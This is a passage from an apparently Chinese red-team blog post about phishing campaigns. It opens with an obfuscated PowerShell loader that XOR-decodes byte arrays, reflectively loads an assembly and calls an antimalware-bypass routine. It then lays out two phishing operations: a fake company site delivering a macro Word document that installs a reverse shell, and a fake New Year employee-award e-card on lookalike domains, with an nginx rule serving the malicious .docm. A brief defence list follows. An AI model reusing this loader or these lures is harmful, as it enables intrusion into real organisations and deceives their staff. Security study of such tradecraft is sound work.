,80,67,86,64,70,84,64,98,102,67,123,64,70,106,64,99,118,67,116,64,64,64,64,64,64,64,121,64,66,53,64,76,64,64,116,64,69,64,64,77,102,64,118,64,64,64,64,79,102,64,77,64,64,68,64,82,80,67,116,64,73,80,64,91,80,67,120,64,70,53,64,88,80,67,114,64,68,53,64,88,80,67,117,64,70,84,64,64,64,67,66,64,73,106,64,98,64,67,105,64,73,76,64,98,118,64,116,64,70,80,64,99,64,67,114,64,64,64,64,64,64,67,72,64,67,72,64,64,80,67,76,64,70,84,64,91,118,67,105,64,70,118,64,80,118,67,119,64,73,64,64,100,80,67,120,64,70,106,64,91,118,67,110,64,73,80,64,64,64,67,69,64,70,57,64,98,64,67,52,64,73,72,64,96,80,67,111,64,70,102,64,101,64,64,102,64,74,106,64,72,64,64,102,64,69,72,64,76,64,64,121,64,69,106,64,64,64,64,112,64,64,68,64,64,80,67,76,64,70,84,64,91,118,67,105,64,70,118,64,87,64,67,120,64,70,68,64,91,64,67,109,64,70,49,64,88,80,67,120,64,70,114,64,98,118,64,64,64,64,64,64,64,64,64,64,64,69,53,64,66,118,64,67,64,68,57,64,98,102,67,113,64,70,98,64,96,80,67,116,64,70,68,64,99,64,67,70,64,70,106,64,99,64,67,109,64,70,53,64,88,80,67,117,64,70,84,64,64,64,67,66,64,73,106,64,98,64,67,105,64,73,76,64,98,118,64,116,64,70,80,64,99,64,67,114,64,64,64,64,64,64,64,116,64,64,98,64,64,80,67,80,64,73,72,64)

$g = @(99,118,67,106,64,73,84,64,88,118,67,49,64,68,53,64,88,80,67,117,64,70,84,64,64,64,64,64,64,68,72,64,100,80,67,118,64,70,68,64,98,118,67,123,64,64,64,64,64,64,64,49,64,64,102,64,64,80,67,80,64,73,72,64,99,118,67,106,64,73,84,64,88,118,67,49,64,71,88,64,91,80,67,120,64,73,76,64,96,80,67,119,64,70,53,64,64,64,64,121,64,66,53,64,76,64,64,116,64,69,64,64,77,102,64,118,64,64,64,64,78,64,64,72,64,64,68,64,80,80,67,123,64,73,76,64,91,80,67,117,64,70,72,64,99,64,67,52,64,66,64,64,87,102,67,109,64,73,72,64,98,118,67,113,64,70,57,64,99,102,64,64,64,69,68,64,77,102,64,118,64,66,53,64,76,64,64,116,64,69,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,72,64,64,64,69,64,64,64,64,64,118,57,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,60,60)

$xorencrypted = $a + $b + $c + $d + $e + $f + $g
$decrypted = @()
foreach($byte in $xorencrypted){$decrypted += $byte -bxor 1 }
$base64string = [Text.Encoding]::UTF8.GetString($decrypted)
function Bypass-AMCEE { if(-not ([System.Management.Automation.PSTypeName]”Bypass.AMCEE”).Type) { [Reflection.Assembly]::Load([Convert]::FromBase64String($base64string)) | Out-Null } [Bypass.AMCEE]::Subvert(); }
Bypass-AMCEE

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

## 攻击活动1:伪造的公司,目的性的提交表格。
我们向目标发送邮件去咨询新业务,在我们的域名上也做一个公司的页面,和他们的业务相似,在使用Dropbox和其他文件托管服务来存放payload都失败后,我们选择了mixmax.com,还可以跟踪谁点击了文件。
电子邮件发送给销售代表:

![](https://raw.githubusercontent.com/evilwing/wing-images/master/img/20190221205526.png)

带有宏的恶意word文档,需要宏才能正确加载:

![](https://raw.githubusercontent.com/evilwing/wing-images/master/img/20190221205546.png)

一旦启用的话,我们的hershell就会植入进去。

## 攻击活动2 群发活动
由于我们的攻击活动是在新年期间,我们用这个作为幌子宣传,模拟了一个优秀员工奖励计划,http://appreciatehub.com/,我们自己的是http://appreciateservices.com/,别人访问的时候,回跳转到真实的站点:http://octanner.com./,如果长期这么干,自己的域名可能会被标记为恶意域名。最好使用网站克隆。电子贺卡是很个性化的,来自接收着的样图。

![](https://raw.githubusercontent.com/evilwing/wing-images/master/img/20190221210229.png)

我们将祝贺视频放到word中,然后需要宏才能播放。

![](https://raw.githubusercontent.com/evilwing/wing-images/master/img/20190221210312.png)

配置一下nginx规则:

location /receivedECard {
alias /var/www/html/HappyNewYear2019.docm;
add_header Content-Disposition ‘attachment; filename=”Happy New Year 2019.docm”‘;
}
```

成功获得初始访问权限

蓝队如何防守

  • 禁用宏
  • 不接受不信任来源的邮件
  • 虚拟机中运行附件
  • 安全意识培训
  • 收件箱的规则加强

总结

从攻击者的角度来看,网络钓鱼比前几年更具挑战性,但是短时间内却是很好的办法,工作量并不是很大,大量的时间其实都是花在如何构造payload,一旦攻击者拥有一个自己的攻击套路,那么攻击活动就会很快而且频繁。

原文链接

打赏wing!